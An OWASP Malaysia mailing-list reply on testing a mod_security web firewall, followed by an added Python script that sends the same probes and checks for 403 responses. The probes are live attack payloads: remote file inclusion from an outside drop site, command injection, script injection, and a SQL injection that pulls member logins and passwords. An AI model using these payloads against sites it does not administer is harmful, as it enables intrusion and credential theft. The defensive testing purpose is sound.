[Owasp-Malaysia] How to test mod_security

Adnan bin Mohd Shukor adnan.shukor at gmail.com
Sun Sep 5 10:28:56 EDT 2010


On 05/09/2010, Muzamir Mokhtar <muzamir at pahang.gov.my> wrote:
> Salam,
>
> I have set up mod_security in my httpd.
> I am using the rules from OWASP.
> I have enabled the rules and use the default ruleset.
> I have enabled the audit log.
>
> Question :
> 1) How do I know my mod_security is working properly?

try basic attacks:

http://cobaan.pahang.gov.my/index.php?page=http://www.rfi-drop-site.net/rfi.txt????????
http://cobaan.pahang.gov.my/index.php?exec=uname -a
http://cobaan.pahang.gov.my/index.php?search=<script>alert(123);</script>
http://cobaan.pahang.gov.my/index.php?id=-13+union+select+concat_ws%280x3a,member_id,member_first_name,member_last_name,member_login,member_password%29,2,3,4+from+members--

If your installation succeeded, you will get a 403 error :)

> 2) Is there any additional modification I need to do in order to block
> attacks such as SQL injection, XSS, spam comments and
> others?

As you mentioned, the rules from OWASP are already in use :) so there is no need
to modify anything for SQL injection, RFI, remote command injection or XSS.

But for comment spam, just put a CAPTCHA in place, that would be neat :)

P/S: I am from Pahang too! :P

>
> Please do advise me on this.
>
> --
> Muzamir bin Mokhtar,
> Information Technology Officer (F44)
> Operations Unit
> Information Technology Division
> Pahang State Secretary's Office
> TEL : 095129424/425
> FAX : 095163490
> http://muzzoshah.blogspot.com
> http://muzzotechspot.blogspot.com
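The check Adnan describes (send the probe requests to your own mod_security host and expect 403), written up as an added smoke-test script; it is not from the original thread. It uses the four probe categories from the post (the SQLi probe is simplified to a plain union select), adds a benign control request so a blocked legitimate request shows up as a false positive, and takes the target host as an argument (the host names below are placeholders); the HTTP fetcher is injectable so the reporting logic can be exercised offline.

```python
"""Smoke-test a ModSecurity + OWASP CRS deployment on a host you administer."""
import urllib.error
import urllib.parse
import urllib.request

# Probe query strings from the thread (host supplied by the caller).
PROBES = {
    "rfi": {"page": "http://www.rfi-drop-site.net/rfi.txt"},
    "command_injection": {"exec": "uname -a"},
    "xss": {"search": "<script>alert(123);</script>"},
    "sqli": {"id": "-13 union select 1,2,3,4 from members--"},
}
# Benign control request: must NOT be blocked; a 403 here is a false positive.
CONTROL = {"page": "home"}


def build_url(base_url, params):
    """Attach URL-encoded query parameters to base_url/index.php."""
    return base_url.rstrip("/") + "/index.php?" + urllib.parse.urlencode(params)


def http_status(url, timeout=5):
    """Return the HTTP status code for url (urllib raises on 4xx/5xx)."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def check_waf(base_url, fetch=http_status):
    """Return {probe_name: verdict}. Probes are 'blocked' or 'NOT blocked (code)';
    the control is 'ok' or 'false positive (code)'."""
    report = {}
    for name, params in PROBES.items():
        code = fetch(build_url(base_url, params))
        report[name] = "blocked" if code == 403 else f"NOT blocked ({code})"
    code = fetch(build_url(base_url, CONTROL))
    report["control"] = "ok" if code == 200 else f"false positive ({code})"
    return report


if __name__ == "__main__":
    import sys
    # Placeholder default; pass your own test host as the first argument.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    for probe, verdict in check_waf(target).items():
        print(f"{probe:18} {verdict}")
```

Anything reported as "NOT blocked" should also be cross-checked against the audit log you enabled, since a rule may log without denying depending on the ruleset mode.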

